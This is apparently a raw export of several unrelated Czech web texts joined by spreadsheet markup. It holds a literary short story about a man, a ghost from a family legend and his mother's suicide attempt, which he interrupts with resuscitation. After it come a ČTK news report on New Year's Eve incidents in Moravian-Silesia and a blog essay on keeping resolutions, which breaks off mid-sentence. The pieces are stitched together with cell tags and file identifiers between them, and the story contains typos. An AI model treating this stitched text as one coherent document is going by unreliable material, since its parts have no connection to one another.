Vzal ho do náruče a najednou byl sám. Než tedy dojel domů, Petrovi zmizely horečky. Naráz. A to už máma s babičkou myslely, že jim snad umře. Doktor z pohotovosti přijel až potom a měl ještě řeči. Vysmíval se plátkům citrónu a brambor, i tomu zábalu. Hm. Tady někde táta zastavil Bertě, u hospody… * „Héééj, šofér, prrr!“ Sakra, Karel by málem zapomněl na dárečka vzadu. Petrův pánovitý rozkaz Karla probral takovým švihem, až sebou škubnul. Už byli skoro u rybníka. Nejspíš si ožralka musí odskočit, došlo mu. Tady by to šlo, radši zajede kousek dál k trati… „Chcát musim, sakra, neslyšíš?!“ Karel šlápl na brzdu. Možná tím riskoval, že mu Petr něco hodí za krk. Ale neodpustil si to, nešlo odolat. Měl na Petra vztek. Všechno za něj vyžírá… „Tak sebou pohni! Ještě se chci vyspat. Já totiž ráno hákuju, jasný?!“ „No jen se nepotento… Vyprázdnit nádržku musim, příroda volá, chápeš, né?“ Petr škytal, jako kdyby se smál nebo fakt skoro blil. Hrabal se z auta, že by ho Karel nejradši kopnul, aby se už, pablb jeden ožralá, vyprázdnil, jak potřebuje. Karel také vystoupil a protáhl se. Až na bráchu byla kolem krásná, voňavá noc, nad rybníkem se vznášel opar a Karel měl dojem, jako když se v něm tu a tam míhají tančící stíny. Babička ráda vyprávěla o vílách a rusalkách, že se v mlze a oparu dají zahlédnout. Karel se soustředil – a skutečně, jako vždycky. Náznak pohybu, tamhle druhý… Nebyl by to Petr, aby aspoň tenhle kus hezkého zase nezkazil. Zašel až do smrkového porostu a asi se tam zamotal, nadával jako špaček. Karel se ušklíbnul a nechal ho tak. Nemá lézt tak daleko, blboun. Kdoví, do čeho tam šlápnul. Jsou blízko stanice, proboha! Lidi nemají, kam jinam od vlaku chodit, když někdo honem potřebuje. „Doprdele, kráva jedna!“ Karla opilcovy problémy nezajímaly. Otevřel bratrovi dveře auta a s chutí nastartoval, aby se ho co nejdřív zbavil. Jestli do něčeho brácha šlápnul, ať to dlouho nesmrdí. Odnese si to do svého obýváku, proti tomu Karel nic neměl. „Tak sem to měl vymyšlený,“ hořekoval opilec. „Moh´ si mít zážitek na celej život, jak se řiká!“ „Uklidni se, za chvíli budeš doma.“ „Mohla mi ho aspoň vykouřit, nána.“ „Hele, drž klapačku! Mě tvoje děvky nezajímají!“ „Tahle by se ti líbila, šénste Bertyčka…“ Petr se škytavě zasmál. Tahle Petrova kouzla s němčinou Karel naprosto nesnášel. Poslal bráchu do prdele jen v duchu, zatímco mu docházelo, že na něj ten debil ušil boudu, která se právě teď nepovedla. Takže tu měla být nějaká jakoby Berta? Vždyť na ni karel nenbí umanutý, není do pověstí až tolik zažraný, už uplynuly roky. Ale vykládej to debilovi, co tě má za hodnýho pitomce. Hm, možná právem… Pokrčil rameny, nemělo cenu mu nadávat. „Ty nejsi zvědavej?“ Petr se dožadoval pozornosti, ale Karel se rozhodl být hluchý a němý. Ostatně musel dávat pozor na cestu, v příkopu zase zasvitla světla srnčí. Zastavil. Dvě, za nimi váhavě třetí, čtvrtá. Těch je! Jako kdyby si tu někdo pěstoval stádo místo krav. „Hézký srnečky, sundej ňákou na večeři…“ Petr dýchal Karlovi za krk. Byla to síla. Karel doufal, že toho moc nenainhaluje. Kdyby měl jako řidič v tu chvíli dýchnout policajtům, určitě by lehce nevyváznul. Petr šťouchl svého šoféra do ramene. „A ty se nezeptáš?“ Nezeptal. „Sem ti pozval Bertu,“ odhalil Petr pyšně. „Je to kočka!“ Karel se už musel držet, aby se nesmál. Takže měl pravdu. Petr mluvil jako malý kluk, který se dožaduje pozornosti. Srny byly pryč, žádná se zákeřně neloudala, mohli jet dál. Už jen pár metrů… „A nebyla tam, jen taková kráva! Tak blbě nahastrošená, to Berta není, že ne? Ty si expert, ty to musíš vědět… Že se mám jako chovat uctivě. K ní, to teda přehnala. Já teda bych se uklonil, ale jen kdyby tam ležely slušný prachy. To bych klidně risknul i hozený šavle.“ Zapadl dozadu a chvíli se té představě smál. Karel na jeho fórky opravdu neměl náladu. Bylo mu přece jasné, že Petr jednu štětku najal a ona asi poslala jinou. Kudy to ale mohla stihnout?! Nikde další auto neparkuje. Navíc Karel nechápal, jak se mu asi měla ukázat a jak ho přesvědčit, že je Berta. A co by z toho velký organizátor Petr asi měl, když by to domluvené představení ani nevnímal. Ožral se fest. Kdyby cokoliv srandovního viděl, tak stejně zapomene. V tomhle stavu si pokaždé zadělá na parádní okno. Naštěstí to nevyšlo, on by si ten parchant něco přimyslel a o další ostudu Karel vážně nestál. Konečně! Konečně dojeli k bytu a mohl bráchu vyložit. Odemkl vchod, rozsvítil, vytáhnul ho z auta a postrčil k domu. Těch pár kroků na vzduchu Petra vzpamatovalo natolik, že si dojde nejmíň do obýváku. Kdyby ne, jeho problém. Konečně to Karel otočil k sobě. * Na hrázi rybníka zpomalil. Nikde nikdo, jenom ten opar nad vodou. Bláznivá Marijka tam prý tančívá, zase mladá, krásná cikánská grófka. Jenže nejvíc v zimě, v době, co se utopila. Takže dneska půjde přece jen o babiččiny rusalky? Nikdy neviděl víc, než mávnutí, jako by se mihla bílá ruka, dlouhé vlasy. Byla to blbost, samozřejmě, ale skvělá blbost. Hmatatelná poezie, kterou dokáže vidět jenom on. Což si už párkrát ověřil. Nejvíc mu asi zavařila babička svými pohádkami a pověstmi. Někdy se mu pletly do snů jakoby záblesky z historie, asi kolem doby Rudolfa II. Nedávalo mu to smysl, nebyl v tom děj. Uklonila se služka, pán s paní stáli u okna, oba ve tmavých šatech s okružím, krásná rukojeť meče, házení kroužků na tyčku, rozesmáté holčičky v dlouhých šatech. Asi proto, že se v něm odmalička hodně pral film Císařův pekař s tím, jak některé scény miloval a jiné mu vadily jako úplná blbost. Stačila v nich maličkost, detail, a Karel už koukal jinam, dokud se děj neposunul. Petrův pokus o vtípek mu ještě nedal pokoj. Potřeboval ho vyhodit z hlavy, jinak neusne. Něco hezkého potřeboval zažít, co by všechno kolem toho pablba přehlušilo. Zaparkoval nad kolejemi, ale nevystoupil. Jenom seděl a těšil se tím pohledem. Stáhl okýnka, vzduch voněl. Byl vlahý, skoro hladil. Karel samozřejmě pořád věděl, že by měl spěchat domů, vyspat se, ráno musí na směnu. Když tu bude dlouho, už se sotva vyplatí zalézt do postele. Ale pojede, za chvilku, aby mamka byla klidná. Sice zbožňuje Petříčka, ale Karlovi nechává na chodbě svítit a na ráno mu chystá svačinu a snídani. Možná je tohle o dost důležitější druh lásky, napadlo ho najednou a hned mu bylo líp. „Jeď domů, potřebuje tě.“ Stála mezi ním a vodní hladinou. Jako by se nohama nedotýkala země, což byla celkem blbost. Vypadala schlíple, žádná velká kráska. Asi ta šlapka, co ji Petr najal. Ani se moc nesnažili dát jí dobové šaty. Cože brácha říkal? Nahastrošená? To asi jo, halena šedivá, jako zadlouho ušmudlaná, dlouhá tmavá sukně, na hlavě kus pomuchlaného hadru. Jaké by vlastně Berta měla mít šaty? Vždyť byla z vesnice. Hm, takže se asi moc nespletli. Natáhl se, otevřel dveře spolujezdce. „Pojď, zavezu tě domů.“ Hned se kousl do rtu. Gentlemans´club je jen lepší bordel, žádné „doma“. „Promiň. Zavezu tě, kam potřebuješ.“ „Pospěš za matkou, je zlá noc.“ „Tak už polez do auta, nezdržuj! Odtud se do rána nedostaneš. Podej mi ruku a pojď!“ Poslechla, nemotorně nasedla, vypadala, jako kdyby se styděla. Možná jí byla zima, vlastně určitě, vždyť byla bosá, obličej měla bledý a rty skoro modré. Oči klopila k zemi. „Hele, ty Berto jedna, připoutej se. No, ten popruh vedle ramena mi podej,“ vrtěl Karel hlavou. Musel to udělat sám. Holce je nejspíš trapně, do čeho ji zatáhli. Připoutal ji, nastartoval a pustil teplý vzduch na nohy. Přišlo mu jí líto. „Nic si z toho nedělej, že princátkovi legrace nevyšla,“ zkusil jí zvednout náladu. „Princátkovi?“ Zvedla překvapeně hlavu. Měla veliké, krásné tmavé oči. „Jo, to si u nás tak hrajeme,“ předstíral, že je mu lehko u srdce. Ale vlastně v tu chvíli docela bylo. „Přimotala ses do takové rodinné historie, měl jsem si sednout na zadek, že jsi Berta z pověsti. Macecha ji hodila do studny, vlastně do komína prokletýho zámku. V podzemí. Znáš ten příběh?“ „Ano, znám. Pocházela z vesnice, pracovitá, zbožná a nevinná. Patřil jí však zlatý prstýnek po mamince. Panstvo tak maminku za věrnou službu odměnilo, ke svatbě darovalo. Pro něj tedy Berta zemřela, oloupená. Ani zlá kouzla však nemohla trestat nevinnou. Leč pro svět již byla mrtvá. Stala se dvorní dámou Paní a vyprosila milost ubohým dětem, které kopaly v podzemí zlato a drahokamy.“ „Znáš to dobře,“ souhlasil Karel. „Právě můj brácha byl na umření zrovna v tu noc, kdy prý táta potkal dívku, která vypadala jako Berta. Souhlasil, že se postará o dítě, které držela. Potom všechno zmizelo a prej v tu samou chvíli brácha ožil. Takový děti si občas pamatujou věci z minulýho života. Petřík brzy potom uviděl v televizi nějakou šavli a začal křičet, že je jeho. Naši se divili, babička se plácla do čela a hned vytáhla pověst o Bertě. S tím, co zažil táta, to považovali za potvrzený a dneska je z toho rodinný tajemství.“ „Pomýlené tajemství. Cožpak se duše dítěte nevtěluje pouze do nenarozených? Jen silné čáry by přenesly duši do umírajícího. Pokud se v rodině narodilo další dítě, ono je tím přijatým. Jistě ne princ, jen syn urozeného pána, rytíře.“ Skoro to šeptala, ale Karel byl rád, že si s ním povídá. Má zajímavou teorii, ale docela realistickou. Tady přece žádný velký šlechtic nežil, nejvýš hrabata Zedwitzů povýšená někdy ke konci osmnáctého století. Rozumná holka. Možná ji zná, připadala mu docela povědomá, možná taky chodila na gympl, někam o hodně níž. Mrknul na ni, jak odevzdaně sedí a opravil se. Vypadala spíš na základní školu. Nebo na úplně nejnižší ročníky? Mohl ji potkávat jako primánku, sekundánku, čertví. Teď mu připadala tak na šestnáct. Kterej hajzl ji do té věci zatáhl? Aby měl Karel malér s nezletilou?! Možná proto je tak zaražená – ale nohy si už natáhla do tepla. Stihla se prohřát, než dojeli do města. Radši ať zmizí a nic jako nebylo. Neviděli se, nepotkali. „Kde chceš vysadit?“ Úplně se vyděsila. Najednou jako když vidí nějakou hrůzu před sebou. Silnice byla prázdná. „Jeď k matce, honem! Je zlá noc, hodně zlá noc!“ Nechápal proč, ale najednou si vzpomněl, že se máma včera hodně pohádala s Petrem. Pan podnikatel vystřelil z domu právě ve chvíli, kdy se Karel vracel od Hynka. Máma se úplně klepala, ale neřekla nic víc, než že se Petr vybarvil jako pěknej hajzl. A večer ty řeči o hodným klukovi? Mohlo by jí teď být blbě, zlobilo ji srdce už od Petrova rozvodu. Dupnul na to. * Nemohl se dostat dovnitř, úplně zpanikařil, oběhl barák, ale nikde ani škvíra, pochopitelně tma jako v ranci. Vlastně ani lampa na chodbě nesvítí?! Nedobouchal se, je fakt zle. Konečně mu došlo, že se sklo v nouzi rozbíjí, a máma je přece v přízemí, ale jak byl uzemněný tím, jak se nemá dělat zbytečná škoda, vykopnul jen okénko do sklepa. Byl tam přece ráno pro brambory a nechal zástrčku jen tak… Mamka ležela v šatech na ustlané posteli, jen ta upravenost jí moc nevyšla, hlavu měla na stranu, jak zvracela. Jasně, prášky a sklenice na zapití. Pro tohle ho tedy chválila, že byl vždycky moc hodný chlapec?! Necítil puls, žádné chrčení, byla však teplá. Honem ji otočil a stáhnul dolů, aby z ní vypadlo, co se dá. Volal záchranku, říkali mu, co má dělat, vyčistil ústa, masíroval, naskočil znatelný tep, honem odemkl a otevřel, znovu utíkal k mámě. „Nech ji odejít, Filipe, je zlá noc,“ zaslechl v tom zoufalství nad sebou. „Co ty můžeš…“ Vzhlédl a přes slzy viděl tu holku, teď v celé její parádě, jako vystřiženou z historického filmu. Čertví, z jakého období. Byla jiná, než v autě. Jen trochu, ale děsivěji. Nechápal, proč měla čerstvou ránu na čele, krev jí stékala po skráních, šrámy na rukách také krvácely, mimo tu krev byla celá bílá jako duch. Na pažích boule, dost nepřirozené, jako kdyby ještě ke všemu potřebovala zošklivět. Snad dokonce promodrávala, zamžikal, jestli se mu to nezdá. Než se stačil zeptat, znovu se ozvala operátorka, mamka zase neměla hmatný puls a Karel dál oživoval. Vzhlédl, když zaslechl sirému erzety. Berta už nebyla sama. Vedle ní se ze tmy vynořovala postava druhá. Tvarovala se do ženy v zelených, zlatem lemovaných šatech, dost parádních, asi jako mívají paní od skupin historického šermu pro dobu – asi gotickou? Ne, mladší. Neměl čas to prohlížet. Blesknutí a věděl. Jako kdyby ho praštily po hlavě nebo rozsvítily reflektory. Znal je, obě. Dál masíroval mámino srdce a zároveň byl tím devítiletým chlapcem, který Léta Páně 1608 předstoupil před vládkyni prokletého zámku a potom vedle dětí dlouho kutal v podzemí. Nebyl si vědom jiné své viny, než že se jeho kůň splašil a v lese ho shodil. Paní totiž uvěznila každého ve svém dosahu. Jen Berta byla jiná, ta nezlobila, nezemřela při neštěstí, té se stala strašlivá křivda. Ta byla silnější, než Panina moc. Zase ho ovanulo dusivé horko, žízeň a věčný hlad, padal únavou, oháněl se vším, co mu dali do ruky. On jako desítky dalších, neustále slyšel nářky a volání maminky nebo tatínka, Boha, prosby o slitování. Jen drahokamy jim pomáhaly, zlato a víra, že snad jednou budou vysvobození. Zase byl tím chlapcem, kterého Paní najednou rozmarně poručila Bertě vzít ze šachet do svého opatrování. Když už jsou prý spříznění krví, že se ve svém údělu věčnosti zabaví jeho výchovou. On, urozený, nebude přece kopat s kmány. Nejdůležitější povinnost ho milá Berta naučila rychle: denně vzývat mládí, krásu a vznešenost své urozené paní. Měl je tu teď obě. Milou Bertu, kterou by s chutí vzal za ruku a jakkoliv vysvobodil k životu na slunci. Za ní rozmarnou zlou ženskou, na které byly krásné jen ty její šaty. Jak ráda naslouchala nářkům a křiku dětí! Nebyly to pouhé duše, měly tělesné potřeby a bolesti, s prokletím věčného údělu skorožití. A ona se smála… Proč je tady?! Nejradši by ji vystrčil z pokoje a skopnul ze schodů. Jakýchkoliv. „Je zlá noc, Filipe…“ Philipp? Ano! Najednou měl jasno v každém detailu. Vzpomněl si na Bertiny cesty, na to, jak se on před Paní odmítl vrátit na svět, dokud bude v podzemí jeden jediný jeho poddaný. Byl přece nejstarším synem rytíře ze starého rodu! Jak se mu posmívala, jak mu slibovala, že se vrátí také a život tady nahoře mu osladí. Vzpomněl si dokonce, že Paní jediná ze všech se může převtělit do umírajícího a tím ukončit svůj trest věčného prokletí. Přestalo ji bavit hromaděné bohatství? Zkrátila si věčnost na osm nebo devět staletí?! Pohlédl na ni, jak lačně sleduje maminčinu tvář, jak se celá třese nedočkavostí. Marně, chtěl by jí říct. Maminka už zase měla slabounký puls, navíc už po chodbě běželi záchranáři. Převzali ji, ustoupil stranou, zacouval až ke zdi. Berta byla vedle něj, chytil její ruku. Studenou, skoro mrazila. Zašeptal, dojatý vším, co se na něj navalilo: „Jak tě mám dovést doopravdy, k živým?“ Zavrtěla hlavou. „Ty žij, Filipe. Žij podle svého. Odjeď odtud, kde ona bude vládnout. Dá-li Bůh, narodím se, avšak nutit se ti za ženu nemohu.“ Moc tomu nerozuměl, nebyl čas přemýšlet. Ke své hrůze uviděl, jak je Paní míjí, přichází blíž a blíž k záchranářům, průsvitní. Ne! Berta mu zmáčkla ruku, vzpamatoval se. Copak by je mohl zastavit?! Smí to? Ne. Nabili, dali šok. Už blbnu, chtělo se mu křičet a zoufale si přitom přál, aby jeho maminka otevřela oči. Zároveň se stejně zoufale bál, že z ní bude Paní. Dlouhá, nekonečná a příšerná bezmoc svědka, který nemůže udělat nic pro ani proti – a Paní zmizela. „Je stabilizovaná, bereme ji s sebou. I ty léky,“ oslovil Karla doktor. Berty si nikdo nevšímal, stála v rohu a po tvářích jí stékaly slzy. Maminku-Paní už naložili na lehátko, vsunuli do sanity a odjeli. Perfektně sehraní, žádné zbytečné řeči, z Karla mezitím dostali všechno, co potřebovali. Jen ještě přijedou policisté, protože to fakt vypadá na sebevraždu a ta se musí vyšetřit. Už tu měli být. * Náhlý klid a ticho cuchaly nervy hůř, než předchozí šílenosti. Karel začal bezmyšlenkovitě uklízet. Kdyby někdo další viděl ten nepořádek, to by mu přece maminka neodpustila. JE to maminka. Zatím… Štiplavý zápach zvratků mu sílu nedodal, několikrát musel odběhnout. Věděl, že tam Berta dál stojí a také věděl, že mu s ničím nemůže pomoci. Ale byla tu a to samo znamenalo hodně. Konečně ji mohl vzít za ruku a dovést do kuchyně. Posadil ji ke stolu. „Můžeš něco jíst a pít? Udělám čaj, zahřeje tě… Jestli můžeš. Pověz mi, co bude dál.“ Berta pokrčila rameny. Neměli moc času, vlastně bylo divné, že tu ještě nebyla policie. A že ještě ona nebyla nějak vysvobozená, ačkoliv ji přitom držel a viděl tak jasně. Rozhodl se věnovat Bertě také proto, aby nemusel šílet bolestí nad mamkou. „Kdy se ti to stalo? Kdy jsi propadla pod zem? Víš, kvůli kulturnímu šoku a tak, vždyť jsi už jako živá. Pomůžu ti v naší době. Můžu ti omýt ty rány a ošetřit? Řekni, můžeš se najíst?“ Podívala se na něj, bolestně usmála. „Mě není pomoci, neboť já sama jiné pomoci neznám, než co jsem ti již pravila. Odvezl jsi mne, podal mi ruku, více mi není známo. Cítím, že stojím mezi dvěma světy, avšak Paní cosi způsobila. Neznám její kouzla. Nadejde-li můj čas a já zmizím, zajisté se narodím. To zvrátit nemohla, ona nás pouze rozdělila. Ty jsi dospěl, já buď zemřu na své rány nebo budu čekat na zrození. Snad se setkáme, snad mne poznáš. Nyní však přemýšlej, co tvou matku zabilo.“ Uvědomil si, že nepohnula rty, že mluví přímo k němu, do jeho mysli. Klekl si u její židle, vzal její ruku a přiložil ke tváři. „Berto, Bertičko, já si najednou vzpomínám na celé dlouhé chvíle s tebou. Možná to byly hodiny, možná celé dny. Měl jsem tě tak rád! Pamatuješ, jak jsem ti říkal? Bertičko Sluníčko?“ Usmála se, druhou rukou ho pohladila po vlasech, Známý pohyb, známá radost. „Jak bych nepamatovala, pro mne je pouhou chvilkou ona noc, kdy jsem tě nabídla otci. Dobrá noc to byla, Bůh se nad tvou matkou slitoval a první dítě jí ponechal. Netrap se pro uplynulý čas. Zde sice běžela staletí, dole však sotva dny. Býval jsi dobrý chlapec, skutečný urozený kavalír – a stal ses dobrým mužem, Filipe. Vzpomněl sis, kým jsi byl a nyní buď o to lepším Karlem.“ To se ti snadno řekne, pomyslel si hořce Karel. I kdyby z mamky už byla jenom ta mrcha Paní, může odejít? Kam? Vysokou nedodělal, i když by mu ty semestry ještě měli uznat… Na to teď není čas, potřeboval slyšet ještě hodně odpovědí! „Proč vlastně? Proč ses objevila až po pětadvaceti letech, když jsem byl poslední?! Každý rok jsi vynášela děti, každý rok přece!“ Vískala mu vlasy, jak to pamatoval. Další vlna marnosti a bezmoci. Mohli se potkat, mohli vyrůst někde vedle sebe… Nebo by mohla ožít teď, bylo jí kolem patnácti šestnácti, dospěla by a rozdíl by nebyl nijak zvláštní. „Nepustila mne. Právě proto ne, Filipe. Teprve, když pro sebe samotnou vycítila příležitost. Nejdřív zkusila tvého bratra, potom letěla sem.“ Takže ona se ukázala Petrovi, vyhastrošená… Berta vzdychla. „Víš, co máš vědět, nejdříve pomoz sobě.“ Tak jo, k ničemu to nevede. Kdyby – chyby, říkávala babička a Petr se přitom vždycky vztekal. Karel vstal, podíval se do čajníku, jestli nezbylo teplé pití. Byl plný. Skoro se dojetím rozbrečel. Maminka s přípravami své smrti nezapomněla na něj, aby měl ráno čaj bez přípravy. Nalil Bertě, ať si s tím poradí, ukázal na cukřenku a citron, ať si zvyká, v koupelně se vysmrkal a nabral půlku lékárničky. Omýval Bertě krev, jenže ta tvrdošíjně tekla dál a dál. Vyděsil se, když pochopil, že pod šrámy a opuchlinami jsou všude zlomené kosti. Včetně lebky. Úlomky se mu hýbaly pod prsty. Jasně, tělo, rozbité po pádu… Panebože, vždyť by úplné obživnutí nepřežila! Nepochopil to, když o tom mluvila. Nebo nechtěl pochopit? Teď musel. Svinskej osud, podraz, nic jinýho! Mrcha Paní, určitě přesně tohle plánovala, aby se jim mohla vysmát. „Bože, Bertinko, copak se mi vracíš takhle?! Bolí to?“ Oddechl si, když zavrtěla hlavou, že ne. S čajem také neuspěl, Berta neuzvedla ani lžičku, natož hrníček. Sama ne, jen když ho přidržel – a stejně neupila. Divné zákony duchů! Smutně na něj koukala a neodvažovala se nic naznačit ani říct. Vypadala hrozně špatně, ke všemu začínala průsvitnět. Jak ji zadržet? Jak jí neublížit? Byl znovu bezmocný. Nevěděl, co říct, bál se ji obejmout, bolel ho její stav. Postával, přešlapoval, mlčel. Všiml si, jak se dlouze zadívala na linku. Předtím si vůbec nevšiml lístku, opřeného o kořenky. Dopis na rozloučenou?! Opatrně ho zvedl k očím. Je to tak! Absolutně neexistuje, aby ho četl sám. Tohle by už dneska vážně nedal. „Prosím, ještě chvíli tu se mnou buď,“ poprosil. Dívala se na něj tak, že honem četl, aby s tím stihl nebýt sám. „Panebože… Mami, ten hajzl…“ V tuhle děsnou noc mnohokrát neměl k pláči daleko a prošel různými podobami zoufalství, ale teď byl rázem jinde. Semkl rty a podíval se k oknu. Jako kdyby zkameněl. Stál a nechal do sebe zapadat střepy dějů, kterým zatím nevěnoval pozornost. Které se před ním skrývaly a nevarovaly. Takhle to bylo, celé poslední dva roky! Karel přerušil školu, pomáhal s tátou, chodil na směny, utahaný od pásu ve flakonce neviděl, neslyšel. Chudák maminka! Zabitá věčnými nadějemi, sliby a přivíráním očí. Tak jako Berta, i ona mu tady nařizovala: Ujeď! Dodělej si školu, postav se na nohy, tady to nech, ať se Petr ze všeho vylíže sám. Jí už obstavili důchod, dům půjde do dražby. Začaly chodit exekuce, jedna za druhou. Nebylo už, kde brát na ty poslední. Všechno pro něj, pro Petra, mamka dokonce ještě zkoušela dávat hodiny klavíru. Tak, aby Karel nevěděl. Proto jí musel začít platit svou část nákladů na provoz domu hotově? Aby jí to nestrhli, nesebrali na něco jiného. I to, co jí dal na opravy domu, zvládla rozdělit, aby Petrovi pomohla. Ale on byl v klidu. Dál sázel a chlastal a užíval. Až se ucho utrhlo. Právě teď. „Vlastně to nedopadlo tak zle,“ otočil se najednou na Bertu. „Jestli se Paní podaří v těle udržet, co z toho bude mít? Trest v podobě zchudlé staré ženské bez domova a přátel. Nikdo jí nebude vykládat, jak je krásná a mladá. Skočila rovnou do stáří, jakého se za jejích časů jen tak někdo nedožil. Celá žhavá, už se nemohla dočkat! Ohyzdná stařena, tak to říkávala, viď? Opovržlivě a zhnuseně.“ Otřásl se odporem při té vzpomínce. Stál však s hlavou vztyčenou, měl jasno. Soudil sice rychle, ale podle práva. Jako jeho dávný otec, Hans Ulrich . Viděl ho záblesku jasné vzpomínky. Slyšel učitelův výklad, jak a proč otec moudře rozhodl spor. „Dostala, co chtěla, mrcha jedna prokletá! Také lidskému zdání se dostane, co vyžaduje. Postarají se o ni, nemusím já. Dostane maminčin důchod, o který ji může Petr obírat. Určitě jim zbyde dost na základní přežití. Já půjdu pryč. Už jen proto, aby na mne Petr nějaký svůj dluh nehodil. Ať si to konečně vyžere, už nemá nikoho v záloze. Chmm, ta ironie, že Princátko rozmazlovali omylem! Dobrá životní fraška, co říkáš? Mno, možná se časem vrátím a přijmu je jako příbuzné, ale nejdřív poslechnu tebe – i maminku. Pomůžu sobě!“ Berta přikývla, oddechla si. Už zase vypadala jako u rybníka, bez otoků a těch ran, jen bledá. Měla krásné veliké hnědé oči, laskavé a usměvavé, jak si je pamatoval. Mizí mu, opouští… Zadrhl se mu hlas, rychle poklekl, drmolil: „Podle těch očí tě poznám, až přijdeš na svět. Chci, abys počkala a přišla ke mně. Jako moje dcera, když to nejde jinak, rozumíš? Odmalička tě zahrnu láskou. Za několik let, nevadí?“ Může se bledá, mizející tvář rozzářit radostí? Kdo nezažil, neuvěří. A kdo zažil, nepopíše. Karel dlouho klečel v prázdné kuchyni s dopisem na rozloučenou a rostoucí tíhou vědění, že je už opravdu sám. U stále otevřených dveří se ozval hlas policisty a Karel se musel z bezpečí a mlh svých minulostí vynořit, vstát, vykročit do reality. Přijmout, co je. Zlá noc má mnoho tváří, ale jednou skončí. Mus</t>
  </si>
  <si>
    <t>2300</t>
  </si>
  <si>
    <t>20250101_262_3695584749_4c007b95c02471a4cc26.html</t>
  </si>
  <si>
    <t>4c007b95c02471a4cc26</t>
  </si>
  <si>
    <t>Osm lidí se v Moravskoslezském kraji zranilo při odpalování pyrotechniky Silvestr v Ostravě : Srážka s divočáky a chodec spadl před vlak 1. ledna 2025 9:46 , aktualizováno 12:40 Sdílet článek ilustrační snímek | foto: Metro.cz Poměrně klidnou silvestrovskou noc mají za sebou moravskoslezští policisté. Nezaznamenali žádnou mimořádnou událost. Ještě ve večerních hodinách ale řešili například srážku dvou automobilů se stádem divokých prasat nebo nehodu, kdy chodec zakopl o koleje a upadl před projíždějící vlak. Strojvedoucí naštěstí stihl včas zastavit. ČTK to řekla mluvčí moravskoslezské policie Soňa Štětínská. Mluvčí krajských hasičů Petr Andráško noc na dnešek hodnotí ve srovnání s jinými v minulých letech za průměrnou. Na silnici I/56 u Paskova večer přes komunikaci proběhlo stádo divokých prasat. Dva vozy se srazily se zvířaty. Čtyři lidé se lehce zranili. Ráno si pak muž mířící z oslavy ve Stodolní ulici krátil cestu přes železniční koleje. "Upadl, ale ke srážce s vlakem nedošlo. Strojvedoucí stihl včas soupravu zastavit," řekla. Policisté také řešili případy výtržností i narušení veřejného pořádku, zaznamenali fyzická napadání v bytech, barech, restauracích i ve venkovním prostředí. "V mnoha případech hrál svou roli alkohol . Máme hlášeny ale i krádeže, dále například i ztrátu všech dokladů. Asistovali jsme hasičům u několika desítek požárů popelnic, krabic od petard, živých plotů a tújí od rachejtlí," řekla. "Nebyla nijak klidná, ale ani nezvykle divoká," řekl k silvestrovské noci mluvčí hasičů. V kraji hasiči evidují od úterních 23:00 do dnešních 07:00 celkem 74 mimořádných událostí, z toho 58 požárů. Šestnáct z nich zavinila pyrotechnika. Autor: ČTK Sdílet článek Autor: ČTK Autor ČTK</t>
  </si>
  <si>
    <t>20250101_263_3694944498_99dc0f2faa89938ca919.html</t>
  </si>
  <si>
    <t>99dc0f2faa89938ca919</t>
  </si>
  <si>
    <t>Předsevzetí do nového roku 2025? Všechno je v&amp;nbsp;hlavě</t>
  </si>
  <si>
    <t>Předsevzetí do nového roku 2025? Všechno je v&amp;nbsp;hlavě Předsevzetí do nového roku 2025? Všechno je v hlavě Předsevzetí jako novoroční zvyk? Pro někoho cíl pro někoho zbytečnost. A nemusíte se u toho ani zapotit. Je na celém světě zvykem dávat si na Nový rok novoroční předsevzetí. Někdo chce přestat kouřit, někdo chce seknout definitivně s alkoholem , další pak chce zhubnout a začít žít zdravěji, někdo chce být jen zdravý a šťastný, někdo si přeje lásku. A všichni dohromady mají jedno společné. Mozek. Tak proč ho nepoužívat? Většina lidí, kteří si nějaké to předsevzetí dají, je nedokáží dodržet. Někdo kouří a řekne si, přestanu. Kdy? Tak ještě tedy jeden den a pak opravdu už s tím seknu. Poslední cigareta a típnu a nezapálím si už další. A tak uběhne další rok a my zjišťujeme, že jsme prokouřili pár krásných dovolených u moře. Někdo si vlastní neúspěch omlouvá slovy, „ale vždyť“. Vždyť jsem ještě mladý/á, život si musím užít, indiáni v pralese také kouří a jak jsou v pohodě, jedna další cigareta mne nezabije, atd. Alkohol ? Vždyť pijeme jen příležitostně. Někdo příležitostně chodí každý den do hospody a tam si dá to svoje „jedno pivo “ a nechá tam 10 prázdných půllitrů a prázdnou peněženku. Domů se pak vrací opilý, doma lehne, (v tom lepším případě), v horším případě se probudí někde úplně jinde a zadělá si na domácí problémy v manželství. „Vždyť já nepiju,“ řekne doma manželce/manželovi a druhý den už se těší, až si zasedne na své místo ke stolu v oblíbeném podniku. Někdo si opravdu jen při příležitostech dá skleničku vína . Ať tak či tak je alkohol bohužel součástí civilizace. Ano, existují výjimky, kdy si člověk dá skleničku a ví, že to má pod kontrolou. A hubnutí? To je doména hlavně žen. O vánočních svátcích přibraly nějaké to deko, nezapnou zip u kalhot, nevejdou se do oblíbených šatů, faldíky jsou vidět, je to strašné jak vypadám, nikomu se nebudu líbit a další sebeobviňování se, že to přes svátky trošičku přehnaly s jídlem. Zapomínají, že celý rok myslely na to, že by chtěly vypadat lépe, ale našly vždy únikovou cestu, jak se vymluvit z návštěvy posilovny, připravit si menší porce na talíř, jít se alespoň jednou za den projít na delší procházku, kdy spálí nějakou tu kalorii navíc, zapomínají si každý den uvědomit, že nejen stres, povinnosti, starosti o děti, rodinu, chodit do práce, řešit tisíce problémů i za partnera nebo tisíce problémů, když jsou samy bez partnera - prostě zapomínají, že každý den je zdravé se zastavit a uvědomit si, jak žijí každý den. Někdo řeší starosti přejídáním, tabulkou čokolády, někdo jiný zase volí extrém - nejíst. A když, tak jedno jablko za den. Žádný extrém není zdravý. Mnoho lidí to ví, ale málokdo své vlastní novoroční předsevzetí dokáže dodržet. A přitom je to opravdu jednoduché a vše je jen a jen v naší hlavě. Jak si mohu toto dovolit tvrdit? Protože jsem to dokázala sama na sobě. Ne, že bych se nějak pozorovala, ale zamyslela jsem se. Kouřila jsem i 40 cigaret denně. Stres, rozvod, sama na děti, existenční problémy. Kouření mi „pomáhalo“ stres lépe zvládat. Pak jsem si řekla: „Holka, STOP! Cigarety lezou do peněz a ty potřebuješ na důležitější věci. Kouříš a přitom tu chvíli bys mohla využít jinak. Utíká ti spoustu drahocenného času.“ A tak jednoho krásného dne jsem zapojila mozek a řekla si - TEĎ KONČÍM S KOUŘENÍM NAVŽDY! A vím, že to dokážu! Protože CHCI! A druhý den jsem si ráno chtěla zapálit cigaretu ke kávě a bylo to hodně těžké. Nezapálila. 14 dní jsem měla doslova absťák, chodila 